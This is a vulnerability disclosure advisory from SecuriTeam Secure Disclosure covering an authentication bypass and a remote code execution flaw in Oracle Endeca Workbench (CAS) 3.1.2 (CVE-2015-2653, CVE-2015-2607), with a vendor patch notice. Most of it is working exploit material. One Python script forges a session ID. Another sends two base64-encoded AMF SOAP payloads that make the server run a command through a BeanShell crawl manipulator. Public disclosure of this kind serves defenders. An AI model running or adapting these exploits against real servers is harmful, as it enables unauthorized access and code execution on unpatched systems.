SecuriTeam Secure Disclosure

SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.

Introduction

Oracle Endeca‘s Web (now called Oracle Commerce Guided Search/Experience Manager Documentation) commerce solution enables your company to deliver a personalized, consistent customer buying experience across all channels — online, in-store, mobile, or social. Whenever and wherever customers engage with your business, the Oracle Endeca Web commerce solution delivers, analyzes, and targets just the right content to just the right customer to encourage clicks and drive business results.

Vulnerability Details

A vulnerability in the session generation mechanism allows unauthenticated users to get “authenticated” status by accessing a page with certain parameters. A vulnerability in the /casconsole/messagebroker/amf file allows attackers that can generate a custom Action Message Format (AMF) file to cause the remote server to execute arbitrary code.



Vulnerable Version

Oracle Endeca Workbench (CAS) version 3.1.2.797565

Session Generation Authentication Bypass

Sample Run of the PoC



#!/usr/bin/python # import requests import sys import re # incase you want a proxy http_proxy = "http://127.0.0.1:8080" proxy = {"http" : http_proxy} def header(): header = """ Oracle Endeca Workbench (CAS) v3.1.2.797565 Session Generation Authentication Bypass x 2014 """ return header if len(sys.argv) <= 1: print header() print "usage: %s [target]" % (sys.argv[0]) print "eg: %s 192.168.51.130" % (sys.argv[0]) sys.exit(1) target = sys.argv[1] print header() print "(+) Generating a remote sessionid..." url = "http://%s:8006/casconsole/?timestamp=1&auth=90" % target r = requests.head(url, proxies=proxy) match = re.search("ESESSIONID=(.*); Path=/casconsole", r.headers['set-cookie']) if match: print "(+) Great! we have a session: %s" % match.group(1)

Remote Code Execution Vulnerability

Sample Run of the PoC



#!/usr/bin/python # import requests import sys from re import search from os import system def header(): header = """ Oracle Endeca Workbench (CAS) v3.1.2.797565 Beanshell Script Remote Code Execution x 2014 """ return header if len(sys.argv) <= 2: print header() print "usage: %s [target] [sessionid]" % (sys.argv[0]) print "eg: %s 192.168.51.130 E78A2028CC999F917B2BF984E1410CA7" % (sys.argv[0]) sys.exit(1) # incase you want a proxy http_proxy = "http://127.0.0.1:8080" proxy = {"http" : http_proxy} s = requests.session() target = sys.argv[1] sessionid = sys.argv[2] print header() url = "http://%s:8006/casconsole/messagebroker/amf" % target headers = { 'Content-Type': 'application/x-amf', # AMF content type 'Cookie': 'ESESSIONID=%s' % sessionid, # this is the session ID we generated } stage1 = open('amf_stage1.dat', 'r') post_s1 = stage1.read() stage1.close() print "(+) Sending our Stage1 SOAPMessage via amf" r = requests.post(url, data=post_s1, headers=headers, proxies=proxy) # we created the crawl if search("createCrawlResponse", r.text): print "(+) Successfully created the remote datasource using a SOAPMessage via amf" stage2 = open('amf_stage2.dat', 'r') post_s2 = stage2.read() stage2.close() print "(+) Sending our Stage2 SOAPMessage via amf" r = requests.post(url, data=post_s2, headers=headers, proxies=proxy) # we started our code if search("startCrawlResponse", r.text): print "(+) Successfully started calc.exe using a SOAPMessage via amf"

AAMAAAABAARudWxsAAMvMjEAAAZZCgAAAAERCoFDR2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlNP QVBNZXNzYWdlDW1ldGhvZBdodHRwSGVhZGVycxdjb250ZW50VHlwZRtyZWNvcmRIZWFkZXJzB3Vy bBV0aW1lVG9MaXZlCWJvZHkRY2xpZW50SWQXZGVzdGluYXRpb24TbWVzc2FnZUlkE3RpbWVzdGFt cA9oZWFkZXJzBglQT1NUCgsBFVNPQVBBY3Rpb24GBSIiAQYvdGV4dC94bWw7IGNoYXJzZXQ9dXRm LTgCBjNodHRwOi8vU1RFVkUtUEM6ODUwMC9jYXMvBAAGkwM8U09BUC1FTlY6RW52ZWxvcGUgeG1s bnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiB4 bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0 dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48U09BUC1FTlY6Qm9keT48 Y3JlYXRlQ3Jhd2wgeG1sbnM9Imh0dHA6Ly9lbmRlY2EuY29tL2l0bC9jYXMvMjAxMS0xMiI+PGNy YXdsQ29uZmlnPjxjcmF3bElkPjxpZD50ZXN0PC9pZD48L2NyYXdsSWQ+PHNvdXJjZUNvbmZpZz4N CgkJCQkJPG1vZHVsZUlkPg0KCQkJCQkJPGlkPkZpbGUgU3lzdGVtPC9pZD4NCgkJCQkJPC9tb2R1 bGVJZD4NCgkJCTxtb2R1bGVQcm9wZXJ0aWVzPjxtb2R1bGVQcm9wZXJ0eT48a2V5PnNlZWRzPC9r ZXk+PHZhbHVlPmM6XDwvdmFsdWU+PC9tb2R1bGVQcm9wZXJ0eT48bW9kdWxlUHJvcGVydHk+PGtl eT5leHBhbmRBcmNoaXZlczwva2V5Pjx2YWx1ZT5mYWxzZTwvdmFsdWU+PC9tb2R1bGVQcm9wZXJ0 eT48bW9kdWxlUHJvcGVydHk+PGtleT5nYXRoZXJOYXRpdmVGaWxlUHJvcGVydGllczwva2V5Pjx2 YWx1ZT50cnVlPC92YWx1ZT48L21vZHVsZVByb3BlcnR5PjwvbW9kdWxlUHJvcGVydGllcz4NCgkJ CTwvc291cmNlQ29uZmlnPjx0ZXh0RXh0cmFjdGlvbkNvbmZpZz48ZW5hYmxlZD50cnVlPC9lbmFi bGVkPjxtYWtlTG9jYWxDb3B5PmZhbHNlPC9tYWtlTG9jYWxDb3B5PjwvdGV4dEV4dHJhY3Rpb25D b25maWc+PG1hbmlwdWxhdG9yQ29uZmlncz48bWFuaXB1bGF0b3JDb25maWc+DQoJCQkJCTxtb2R1 bGVJZD4NCgkgICAgICAgICAgCQkJPGlkPmNvbS5lbmRlY2EuY2FzLm1hbmlwdWxhdG9yLk1vZGlm aWVyU2NyaXB0TWFuaXB1bGF0b3I8L2lkPg0KCSAgICAgICAgCQk8L21vZHVsZUlkPg0KCQkJCQk8 bW9kdWxlUHJvcGVydGllcz48bW9kdWxlUHJvcGVydHk+PGtleT5zY3JpcHRTb3VyY2U8L2tleT48 dmFsdWU+ZXhlYygiY2FsYy5leGUiKTs8L3ZhbHVlPjwvbW9kdWxlUHJvcGVydHk+PC9tb2R1bGVQ cm9wZXJ0aWVzPg0KCQkJCQk8aWQ+c2k8L2lkPg0KCQkJCQk8ZW5hYmxlZD50cnVlPC9lbmFibGVk Pg0KCQkJCTwvbWFuaXB1bGF0b3JDb25maWc+PC9tYW5pcHVsYXRvckNvbmZpZ3M+PC9jcmF3bENv bmZpZz48L2NyZWF0ZUNyYXdsPjwvU09BUC1FTlY6Qm9keT48L1NPQVAtRU5WOkVudmVsb3BlPgZJ MUVFNTdGQjYtMEEwOS1BQ0RDLUY2MTAtQjYxQTE5ODcyMTAyBiFodHRwLWRlc3RpbmF0aW9uBklD NDRFODEwRS00RDc5LTczNDAtQkE0RC05OEJFNUE1NTcxRTYEAAoFFURTRW5kcG9pbnQGF2FtZi1j aGFubmVsCURTSWQGSTFFRTU3NjBBLTc0MUQtRTUwQi1FRDI2LTIzNDdBMzY4NjJCMgE=

AAMAAAABAARudWxsAAMvMjQAAALfCgAAAAERCoFDR2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlNP QVBNZXNzYWdlDW1ldGhvZBdodHRwSGVhZGVycxdjb250ZW50VHlwZRtyZWNvcmRIZWFkZXJzB3Vy bBV0aW1lVG9MaXZlCWJvZHkRY2xpZW50SWQXZGVzdGluYXRpb24TbWVzc2FnZUlkE3RpbWVzdGFt cA9oZWFkZXJzBglQT1NUCgsBFVNPQVBBY3Rpb24GBSIiAQYvdGV4dC94bWw7IGNoYXJzZXQ9dXRm LTgCBjNodHRwOi8vU1RFVkUtUEM6ODUwMC9jYXMvBAAGhQ88U09BUC1FTlY6RW52ZWxvcGUgeG1s bnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiB4 bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0 dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48U09BUC1FTlY6Qm9keT48 c3RhcnRDcmF3bCB4bWxucz0iaHR0cDovL2VuZGVjYS5jb20vaXRsL2Nhcy8yMDExLTEyIj48Y3Jh d2xJZD48aWQ+dGVzdDwvaWQ+PC9jcmF3bElkPjwvc3RhcnRDcmF3bD48L1NPQVAtRU5WOkJvZHk+ PC9TT0FQLUVOVjpFbnZlbG9wZT4GSTFFRjFEQjRCLUY4MEMtMDlENy0yRjI1LUIyRjBBNTI2MTA4 MwYhaHR0cC1kZXN0aW5hdGlvbgZJNUE5RTQ1QjktQ0QwRS1GMkQxLUM2MTctOThDMzQzRjM2NkVE BAAKBRVEU0VuZHBvaW50BhdhbWYtY2hhbm5lbAlEU0lkBkkxRUYxRDE3OS01MjI4LTRBNTAtMzIz Ni0xMzE2Njk1RjIyRkIB

Vendor Response

The following issues reported by you are fixed in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on July 14, 2015. We ask that any information that you plan to publish regarding these issues be released after this date and time.

This Critical Patch Update will contain fixes for the following issues:

S0540546 ENDECA WORKBENCH REMOTE CODE EXECUTION

S0540533 ENDECA WORKBENCH AUTHENTICATION BYPASS

CVE

Two CVEs have been assigned to these two vulnerabilities, CVE-2015-2653 and CVE-2015-2607